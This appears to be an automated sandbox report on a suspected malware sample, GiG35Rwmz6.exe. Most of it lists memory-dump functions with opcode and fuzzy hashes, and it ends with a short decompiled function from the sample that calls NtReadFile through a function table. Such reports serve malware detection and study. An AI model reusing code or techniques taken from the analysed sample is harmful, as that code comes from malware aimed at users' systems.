API ID:
String ID:
API String ID:
Opcode ID: 612bb83063b7d653c6a9a30a3f8659a56d2a09904670eac02124ae25b773d788
Instruction ID: c0a1322e5572126b3726a86c1d34239a88d934b9b79781ec8f493998201003e2
Opcode Fuzzy Hash: 612bb83063b7d653c6a9a30a3f8659a56d2a09904670eac02124ae25b773d788
Instruction Fuzzy Hash: 2DD129B0E0421ACBCB14DFA9C980AAEFBB2FB89304F24D269D504A7355D734AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F37584, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a0fdb7a6a6a7f19c2822a2392934dc321075970cd3bc3ec544ce5b44a2a45b
Instruction ID: 65a421beec09d9d2196b7309e2d6664f77eea601c855c9b42ba238ba4ce55d88
Opcode Fuzzy Hash: 16a0fdb7a6a6a7f19c2822a2392934dc321075970cd3bc3ec544ce5b44a2a45b
Instruction Fuzzy Hash: 0CC14AB4E0426ACBCB14DFA9C980AADFBB2FB89304F24D269D514A7345D734AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F34AC0, Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45fd0f78bfa8cd5afc7882c3c1e541852df88d14cfa11c2643f7b81d1334228e
Instruction ID: 02fd6051c8185de0d8d5eb112f5837e6caa68dd45210e3f13abc1224dbcd0352
Opcode Fuzzy Hash: 45fd0f78bfa8cd5afc7882c3c1e541852df88d14cfa11c2643f7b81d1334228e
Instruction Fuzzy Hash: F1B1F474E04219CFDB14CFA9C980A9EFBB2BF89304F24C1A9D519AB365D7349941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F39850, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce37cea4cf465d8aca6b33b2fdd7c5ddabd775a312549d4367529f3d0a936bf
Instruction ID: a4ce2c7b34704d772d453bc9dac479ce93a5a56eac6411152fb3152f0b46fd61
Opcode Fuzzy Hash: 2ce37cea4cf465d8aca6b33b2fdd7c5ddabd775a312549d4367529f3d0a936bf
Instruction Fuzzy Hash: ECA1F275E06209DBDB04CFAAD5819AEFBF2AB89340F60D42AD405BB314D7B49A81CF54

Uniqueness

Uniqueness Score: -1.00%

Function 09F34ABF, Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 077528b37467bf8b74d046f1d701bd8df9e1f63508f429d715c019ceee3927af
Instruction ID: ba53f1826887766dd06a4805dd5a1456e175a548a6707e0dc2ff412520d60e93
Opcode Fuzzy Hash: 077528b37467bf8b74d046f1d701bd8df9e1f63508f429d715c019ceee3927af
Instruction Fuzzy Hash: AAA1E574E142198FDB14CFA9C980A9EFBB2AF89304F24C1A9D509AB365DB349941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F33720, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d4e028cfd67b8de0233c072573f4f5ddf01373b72eb3989b93bcb3843e8831
Instruction ID: 2af8a616ba7c45b8151d9eab94e39a8f68bb5161790245328ab36ba2ba5680b2
Opcode Fuzzy Hash: 39d4e028cfd67b8de0233c072573f4f5ddf01373b72eb3989b93bcb3843e8831
Instruction Fuzzy Hash: 14815335A553259FCB5DCEB0C0CB18ABFF1FF10A0071092AED98AD98B5DB369245DB84

Uniqueness

Uniqueness Score: -1.00%

Function 09F36D68, Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b1df881481fdac0737457e56defe3e1233199bcccaabc27c35e28ae242a60a
Instruction ID: 28f878b6773e71a085e7efa3f733d8af4e771b891a4fd10e312a9136ba6f929e
Opcode Fuzzy Hash: 54b1df881481fdac0737457e56defe3e1233199bcccaabc27c35e28ae242a60a
Instruction Fuzzy Hash: 099126B4E142299FDB14DFA9C980A9EFBB2BF89304F24C1A9D908A7355D7349D41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 09F34BA2, Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d4e383a9e84ff96eac1cc2a9a85618961896dee2207053cc8172247ae46d73
Instruction ID: fa513a443d0e77fc9a4b93504d8a85b0e31143b34265f57842a55df3bed27d75
Opcode Fuzzy Hash: f2d4e383a9e84ff96eac1cc2a9a85618961896dee2207053cc8172247ae46d73
Instruction Fuzzy Hash: 9591F674E04219CFCB14CFA8D980AADFBB2BB49304F6481A9E509AB365D734AD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 09F36D61, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83857012683c451ff01a73be61cf807fb229fe33eae76a49194d14392e16512d
Instruction ID: 7a0afc92b81d6e7dd22846c860768a02ee58d7537d94fe733089099568172935
Opcode Fuzzy Hash: 83857012683c451ff01a73be61cf807fb229fe33eae76a49194d14392e16512d
Instruction Fuzzy Hash: 019126B4E142299FDB14CFA9C981A9EFBB2BF89304F24C1A9D508AB355D7349D41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C83E80, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0c9cea5af6118dff3b675c0b6d0505aa2c0a7e97efcd1a30ce706229b5f28a
Instruction ID: 6a73a020f075a696c216182b7319ff73015f0975bcfd5cd067b72ba9c44a184d
Opcode Fuzzy Hash: 2c0c9cea5af6118dff3b675c0b6d0505aa2c0a7e97efcd1a30ce706229b5f28a
Instruction Fuzzy Hash: 4281EF74E1521ACFCB04DFAAC58499EFBF2FF89310B259469D415AB320D330AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C83E71, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 756c700af09e4e8ca93b48d7917c8513a0c2bf0c9433f8990d9248b4b94c81b5
Instruction ID: 329ea50bf1cd312cf3b86cc4121d1ec93c6c58b683062d9652d5dcc019e1a7a1
Opcode Fuzzy Hash: 756c700af09e4e8ca93b48d7917c8513a0c2bf0c9433f8990d9248b4b94c81b5
Instruction Fuzzy Hash: 50810274E1525ACFCB04DFAAC58499EFBF2FF89310B25946AD415AB320D330AA42CF55

Uniqueness

Uniqueness Score: -1.00%

Function 09F35858, Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286560153ee0375584dd84fb3dd878679738db782297a6372a9e3c03cf764c89
Instruction ID: 4e0053809c3712f33fb48b475270d5ddb8e2f269d0fcf226b76585249304cb14
Opcode Fuzzy Hash: 286560153ee0375584dd84fb3dd878679738db782297a6372a9e3c03cf764c89
Instruction Fuzzy Hash: 4B513671E052199FDB04CFEAD4816EEFBF2AFC8310F54D526E418A7254E7389A418FA1

Uniqueness

Uniqueness Score: -1.00%

Function 09F35849, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 107707d742b3f816419f8711e0caa3d76ff05c72b0f9261ee154055445cc3738
Instruction ID: a0aa4af634d2dcdaf7f3e233d98a4ff9c20f81cf71013e140531cfe75842afe4
Opcode Fuzzy Hash: 107707d742b3f816419f8711e0caa3d76ff05c72b0f9261ee154055445cc3738
Instruction Fuzzy Hash: 24513771E052199FDB04CFEAC4816EEFBF2AFC8310F54D526E418A7254E7389A518FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C84A78, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d2cd3d8aaca1cb234723b55cc576d326b4032b0590c2318155df3205f232c1
Instruction ID: 3aa5f2a7c56607d6848f1284c6d1a701404f8fbc1f3576f0d491d87c510d51d3
Opcode Fuzzy Hash: c2d2cd3d8aaca1cb234723b55cc576d326b4032b0590c2318155df3205f232c1
Instruction Fuzzy Hash: 0571E5B4D0421ADFCB48DF99D4809EEFBB1FF49314F259516D415AB214C734A982CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 09F35AF8, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851a3b6334f9a3c01bb48082290b6e2bde7ab1541b114e63fe116c4b8abdacdc
Instruction ID: d09d027a0ec97650c4190d4a29875e7ee110124c8ccd592ca430e3393cf5b0de
Opcode Fuzzy Hash: 851a3b6334f9a3c01bb48082290b6e2bde7ab1541b114e63fe116c4b8abdacdc
Instruction Fuzzy Hash: F4614971E012199FDB18CFA9D981A9EFBB2FF88340F50D46AE50DAB254DB345A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 09F30571, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d3b50766780b9a7eda1d5496362108a09655a7ecc984968ca4641c03d4e220
Instruction ID: 9483b4098c7973263663eb354d04de7296b9085506dd78be34db50699cc7fb0a
Opcode Fuzzy Hash: 27d3b50766780b9a7eda1d5496362108a09655a7ecc984968ca4641c03d4e220
Instruction Fuzzy Hash: 2C61E175E052098FCB48CFA9C5819DEFBF2EF88310F28D46AD415B7224DB34AA41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 09F30012, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad6c69740bc3a85a87e5813e84d03099a583b9542b813f3cdd9ccba6d3ce270c
Instruction ID: 6bf8cb6a1d50d8516d8e6853e528767215ff6e54c1a6bd9bc6e52a24623ae585
Opcode Fuzzy Hash: ad6c69740bc3a85a87e5813e84d03099a583b9542b813f3cdd9ccba6d3ce270c
Instruction Fuzzy Hash: 156118B1D05249DFCB04CFA5C4409EEBBF2BF85340F58C06AD411A7254D7789A81CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C84A69, Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90381feaa1481748a42b0b46651a907e252105cbaa6accfee0a7e46fb5a7bac8
Instruction ID: 0ac389998c3a7a49dadfb2888dbf2bb1ef94277b27c1cdc39e4bef0fd7d9d653
Opcode Fuzzy Hash: 90381feaa1481748a42b0b46651a907e252105cbaa6accfee0a7e46fb5a7bac8
Instruction Fuzzy Hash: 4061D574E0420ADFCB48DF9AC4809AEFBF1FF89314F298556D415AB214C734A942DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 09F30580, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99e2ce8adbb22930a8df8d6dfbae155440da74a596e65093533df60d2b19fba4
Instruction ID: 906ed260bb8ed525872565bff798e43523d6258c90cd9c5b3cd585a9a14a5e03
Opcode Fuzzy Hash: 99e2ce8adbb22930a8df8d6dfbae155440da74a596e65093533df60d2b19fba4
Instruction Fuzzy Hash: 6761D075E052198BCB48CFAAC5809DEFBF2FF88310F68D16AD415B7224DB349A41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C85310, Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57802649ad545bbde9288585be2bf5867359045379d5b26b8188750b0dffa11
Instruction ID: f8c3a8118f201e656ecc2bdc42050d27b5dd0732d002930133d0e9e44caffc89
Opcode Fuzzy Hash: d57802649ad545bbde9288585be2bf5867359045379d5b26b8188750b0dffa11
Instruction Fuzzy Hash: AC61D070E056198FCB04CFAAC9809DEFBF2FF89354F24952AD415B7224D7709A428B68

Uniqueness

Uniqueness Score: -1.00%

Function 00C85301, Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e58a60c44e2949da9570e2c7f5783826c8f9682c410bddd94bc284e6bca966
Instruction ID: 66c9591286f84a5d7904224a6c4bef51a60b97a99dd2241eb81b053f757391da
Opcode Fuzzy Hash: b2e58a60c44e2949da9570e2c7f5783826c8f9682c410bddd94bc284e6bca966
Instruction Fuzzy Hash: 7F61E274E056098FCB04CFAAC9805DEFBF2FF89354F28956AD415B7224D3709A42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 09F39C58, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0aa241647ab8fd08fc5a3e46179fb02c36c4b7526ec0fbb0e2839bbe9c337b9
Instruction ID: 6586e9808021094d0d6624f1406e7158172229780231a0ec708189d3c674f1fb
Opcode Fuzzy Hash: a0aa241647ab8fd08fc5a3e46179fb02c36c4b7526ec0fbb0e2839bbe9c337b9
Instruction Fuzzy Hash: 635119B1E04629CBDB28CF66C8447ADF7B6BFC9301F14D6AAC409B6614EB745A858F40

Uniqueness

Uniqueness Score: -1.00%

Function 09F35AF7, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb7657720ae4d4ed9ae2d8b538727e4687a4ecbfc2b48c5df7a618d322a4c90
Instruction ID: bea648a224ab1c82106c1c8ae7e624921adbcba81252b1efa57b5de77a945d96
Opcode Fuzzy Hash: afb7657720ae4d4ed9ae2d8b538727e4687a4ecbfc2b48c5df7a618d322a4c90
Instruction Fuzzy Hash: 86516B71E112199FDB18CFA9D981A9EFBF2BF88300F50D46AE509AB354DB349A418F50

Uniqueness

Uniqueness Score: -1.00%

Function 09F39C57, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00224829b1e420ab6242c905579918c90f40a02e29013307aaa564bdad738b10
Instruction ID: a88480ddd86a628c763d6c432d9d4cd31afd764d089ee1ccf857188c9d65ac1a
Opcode Fuzzy Hash: 00224829b1e420ab6242c905579918c90f40a02e29013307aaa564bdad738b10
Instruction Fuzzy Hash: 435118B1E0066ACBDB28CF66C84479DF7B2BFC9301F04C6AAD409B6614EB745A858F40

Uniqueness

Uniqueness Score: -1.00%

Function 09F35BA3, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7cb9ca5c67581c5627dbf49f41fbd3d233429c23f2b52c8aa870e0ded808ac
Instruction ID: 4222c029d8b1d3db4c00ac942ba4a6bd521fae05f9be91aaf7b1d5414ba3bf9d
Opcode Fuzzy Hash: df7cb9ca5c67581c5627dbf49f41fbd3d233429c23f2b52c8aa870e0ded808ac
Instruction Fuzzy Hash: 51514871E15219DFCB14CFA4D981A9EF7B2FF88340F50D46AE909AB364DB389980CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00C85548, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9287cdd4f14823c4124fbcf87be6eb2a9887d507e40118c4763fadc40b90b014
Instruction ID: 9a9f2ced99ee423539a259e100f8e0b9f7dfc876be2f811d83270d330a6d5225
Opcode Fuzzy Hash: 9287cdd4f14823c4124fbcf87be6eb2a9887d507e40118c4763fadc40b90b014
Instruction Fuzzy Hash: DE5118B4E1560A9FCB04CFAAC5815AEFBF2FF88304F24D46AC505AB214D7749A41CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00C85558, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e71313dd86b510e97838cbc2d18b07cd382fa8a200f721309b2207243f848be
Instruction ID: f4042668e5a2d841dc53b23fd08973918d974ef09a470a2053998bcfeb32851c
Opcode Fuzzy Hash: 0e71313dd86b510e97838cbc2d18b07cd382fa8a200f721309b2207243f848be
Instruction Fuzzy Hash: B151F9B4E1560ADFCB04DFA6C5415AEFBF2FF88304F24D46AC505AB214D7749A418F98

Uniqueness

Uniqueness Score: -1.00%

Function 09F31498, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c455d5de6186dd184c09f6ca0fa498b45ca896b960817b3da9997ddf695c30
Instruction ID: 2111bb45040c379e380889cac038abb61ddf98f4f48195e47d6b4da79a17f594
Opcode Fuzzy Hash: e6c455d5de6186dd184c09f6ca0fa498b45ca896b960817b3da9997ddf695c30
Instruction Fuzzy Hash: 1B514EB1E056588BEB1CCF6B9D4469EFBF3BFC9300F14C1BA950CA6214EB3409468E11

Uniqueness

Uniqueness Score: -1.00%

Function 09F307B0, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2209280e107f3311189a1d65ea0ce430f4f3ca3228e3f940502d6898079829a
Instruction ID: bb424dc31bf7b3d8c5eb1b3e5ca37f58cd3104f3fddd6e804c1f9a4a05c64865
Opcode Fuzzy Hash: e2209280e107f3311189a1d65ea0ce430f4f3ca3228e3f940502d6898079829a
Instruction Fuzzy Hash: 58411871E0620ADFDB48CFA9C5805AEFBF2BF89300F28C16AD505B7254D7349A51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 09F35C31, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6cd71ebbac80be1034f110372f4d059a3ab8cf23a7b8be543e863d54f2a5c16
Instruction ID: 9b3f1d4ee00ecfc2cd8804b289cc6d9c7ef307a5a11c7e28d94a310e1cf76853
Opcode Fuzzy Hash: f6cd71ebbac80be1034f110372f4d059a3ab8cf23a7b8be543e863d54f2a5c16
Instruction Fuzzy Hash: 0B414A71E15219DFDF14CFA4D981A9EF7B2BF88340F50D46AF909EB264D7389A418B10

Uniqueness

Uniqueness Score: -1.00%

Function 09F307C0, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 666a083555f879cb132330d827e72eae5c42fc90f6a77bfe0267e5b42ad5d5a6
Instruction ID: fbbef68beadd40efddc1f7b15f8dac4f88efe0d036b3a81f5c65be27af423d09
Opcode Fuzzy Hash: 666a083555f879cb132330d827e72eae5c42fc90f6a77bfe0267e5b42ad5d5a6
Instruction Fuzzy Hash: 7D4109B1E0620ADBDB48CFA9C5805EEFBF2BF89300F24D16AC515B7244D7389A41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 09F31497, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83e930196599b3f5c6dbbeda7f554b24550e829816ee538d5419cef01377eaf
Instruction ID: 59de40c7f2484d318a242430ae06d706dc98a53a6bc01f1ffd02a5309864f6cd
Opcode Fuzzy Hash: e83e930196599b3f5c6dbbeda7f554b24550e829816ee538d5419cef01377eaf
Instruction Fuzzy Hash: 66412FB1E056588BEB1CCF6B8D4568EFAF3BFC8300F14C1BA950CA6224EB3409458F11

Uniqueness

Uniqueness Score: -1.00%

Function 09F39E83, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b8a5813088622dfa2f66f067d358abd37825aa34fa149f8da60de3be8be36e
Instruction ID: 825790b0c0adc2b78b6365c5b6c2d302bca7192c9cfbb957451e6added408d7a
Opcode Fuzzy Hash: e6b8a5813088622dfa2f66f067d358abd37825aa34fa149f8da60de3be8be36e
Instruction Fuzzy Hash: C84106B5E1066ACBDB24CF65C9447ADF7B2BB89301F50C6E6D40AB2600E7B49AC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 09F39E65, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65810837713232e5b283021a868cd460ca41fd4be7289e400e7062215e9db3e
Instruction ID: d9dce9782999f5a3de0adf04c9772ec349a066ab93bbfd8bc78fb1e3ae585269
Opcode Fuzzy Hash: c65810837713232e5b283021a868cd460ca41fd4be7289e400e7062215e9db3e
Instruction Fuzzy Hash: 044116B5E1066ACBDB24CF65C9447ADF7B2BB89301F10C6E6D40AB2600E7B49AC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C850F8, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cccd068dd60620f370d507773110a769c9b65d255c028a61aa2506f293098a
Instruction ID: e1f267174565a13c577d1e468855a1322d596e68bb0d5c4dcc01a35abf51e670
Opcode Fuzzy Hash: 21cccd068dd60620f370d507773110a769c9b65d255c028a61aa2506f293098a
Instruction Fuzzy Hash: FF41F7B4D0460A9FCB44DFAAC4816AEFBF2FF88304F24D06AC415A7254D7749A41CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00C85108, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a809599b64673578138a3b79069e8687249eef43d461b9b5777cf1c68c9435
Instruction ID: daca11922705a90382e5cbc7b58277d10c9eae5df1df29b58779acac06adad1f
Opcode Fuzzy Hash: 17a809599b64673578138a3b79069e8687249eef43d461b9b5777cf1c68c9435
Instruction Fuzzy Hash: CC41F7B4D0460A9BCB44DFAAC4816EEFBF2FB88344F24D06AC415A7614D7745A41CF98

Uniqueness

Uniqueness Score: -1.00%

Function 09F30990, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680320814.0000000009F30000.00000040.00000001.sdmp, Offset: 09F30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642eccaba04bfa3c0a980663b48efa33dea8d1122d3253d04866565a1df0f5fa
Instruction ID: 1372d96d8c1da46e822c66cea5c29ee92d0fa27141c97fd4ba85424efbb383c1
Opcode Fuzzy Hash: 642eccaba04bfa3c0a980663b48efa33dea8d1122d3253d04866565a1df0f5fa
Instruction Fuzzy Hash: 75212C71E156188BEB18CFABD8406DEFBF7AFC9200F18D076D808A6264EB3455428F51

Uniqueness

Uniqueness Score: -1.00%

Function 00C80480, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47c9f9aa9916be190d41e5294059d0489ffb17d50824d67c9d39e3c9f22ca2e7
Instruction ID: 566ebd0fcda3fa80e2ebfe49034bba8ebd98ac0b9b837195ea0ec7b6dcb5a6c0
Opcode Fuzzy Hash: 47c9f9aa9916be190d41e5294059d0489ffb17d50824d67c9d39e3c9f22ca2e7
Instruction Fuzzy Hash: 5511DA71E04A189BEB5CCFABDC4069EFAF7AFC8300F14C17AD918A6264EB3015468F55

Uniqueness

Uniqueness Score: -1.00%

Function 00C80479, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.675515445.0000000000C80000.00000040.00000001.sdmp, Offset: 00C80000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8573ab8222714dfc28e9413d0f89f84ba77fc329251f8046ec6c97558ee0310b
Instruction ID: 69aa988a186b6e480d8afda17c2d3378e2916219dd6af070e726bcf28920e644
Opcode Fuzzy Hash: 8573ab8222714dfc28e9413d0f89f84ba77fc329251f8046ec6c97558ee0310b
Instruction Fuzzy Hash: 4E11BC71E00A188BEB5CCFABD94469EFAF3AFC8300F14C17AD918A6264DB3445468F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: GiG35Rwmz6.exe PID: 6784 Parent PID: 6564 GiG35Rwmz6.exeCOMMON

Executed Functions

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419fe3
0x00419fef
0x00419ff7
0x0041a002
0x0041a01d
0x0041a025
0x0041a029

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025

Strings

BMA, xrefs: 0041A002, 0041A010
BMA, xrefs: 0041A01D, 0041A024

Memory Dump Source

Source File: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
